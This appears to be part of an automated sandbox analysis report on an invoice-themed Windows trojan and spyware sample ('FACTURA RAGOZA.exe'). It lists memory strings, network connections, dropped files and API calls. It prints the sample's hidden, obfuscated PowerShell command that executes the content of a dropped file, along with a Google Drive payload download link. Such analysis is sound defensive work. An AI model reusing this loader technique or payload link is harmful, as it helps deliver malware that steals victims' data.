Source: msiexec.exe, 00000006.00000002.2940688123.0000000023E21000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023E1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2923740426.000000000068A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2923740426.000000000068A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2924306204.00000000008D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-
Source: msiexec.exe, 00000006.00000002.2923740426.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=download
Source: msiexec.exe, 00000006.00000002.2923740426.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=downloadA&
Source: msiexec.exe, 00000006.00000002.2923740426.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=downloadO&
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D1D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023CAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023CAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023CD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D1D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023CD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024EDB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D37000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D85000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024DAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EB7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EE2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024EDB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D37000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D85000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024DAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D3E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EB7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D88000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024EE2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2942294889.0000000024D13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354544341.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354544341.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354544341.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023E4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 54181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54115
Source: unknown	Network traffic detected: HTTP traffic on port 54160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54181
Source: unknown	Network traffic detected: HTTP traffic on port 54191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54121
Source: unknown	Network traffic detected: HTTP traffic on port 54170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54170
Source: unknown	Network traffic detected: HTTP traffic on port 54121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54131
Source: unknown	Network traffic detected: HTTP traffic on port 54140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54191
Source: unknown	Network traffic detected: HTTP traffic on port 54194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54083 -> 443

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.4:54072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:54083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:54194 version: TLS 1.2

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405086

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe

Jump to dropped file

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040310F

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_004048C5	0_2_004048C5
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_004064CB	0_2_004064CB
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_00406CA2	0_2_00406CA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_076BC936	1_2_076BC936
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047C146	6_2_0047C146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047D278	6_2_0047D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00475362	6_2_00475362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047C738	6_2_0047C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047E988	6_2_0047E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047CA08	6_2_0047CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047CCD8	6_2_0047CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00473E09	6_2_00473E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047CFAA	6_2_0047CFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00477118	6_2_00477118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047F974	6_2_0047F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0047E97A	6_2_0047E97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00479DE0	6_2_00479DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C317A0	6_2_23C317A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C30B30	6_2_23C30B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C31E80	6_2_23C31E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C39548	6_2_23C39548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C32968	6_2_23C32968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3FC68	6_2_23C3FC68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C39C70	6_2_23C39C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3178F	6_2_23C3178F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38B91	6_2_23C38B91
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38BA0	6_2_23C38BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3F3B0	6_2_23C3F3B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3F3B8	6_2_23C3F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3EF59	6_2_23C3EF59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3EF60	6_2_23C3EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3EB08	6_2_23C3EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C30B20	6_2_23C30B20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3EAFF	6_2_23C3EAFF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3E6A1	6_2_23C3E6A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3E6B0	6_2_23C3E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3E253	6_2_23C3E253
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3E258	6_2_23C3E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C31E70	6_2_23C31E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3DE00	6_2_23C3DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3DDF3	6_2_23C3DDF3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3D99D	6_2_23C3D99D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3D9A8	6_2_23C3D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3D547	6_2_23C3D547
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3D550	6_2_23C3D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C32959	6_2_23C32959
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3953D	6_2_23C3953D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3D0F8	6_2_23C3D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3CC97	6_2_23C3CC97
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3CCA0	6_2_23C3CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C30040	6_2_23C30040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C39C69	6_2_23C39C69
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3F807	6_2_23C3F807
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3F810	6_2_23C3F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3501B	6_2_23C3501B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3001F	6_2_23C3001F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C35028	6_2_23C35028

Source: FACTURA RAGOZA.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/14@5/5

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

0_2_0040310F

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404352

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

File created: C:\Users\user\AppData\Local\Temp\nsn8EB7.tmp

Jump to behavior

Source: FACTURA RAGOZA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

File read: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA RAGOZA.exe "C:\Users\user\Desktop\FACTURA RAGOZA.exe"
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
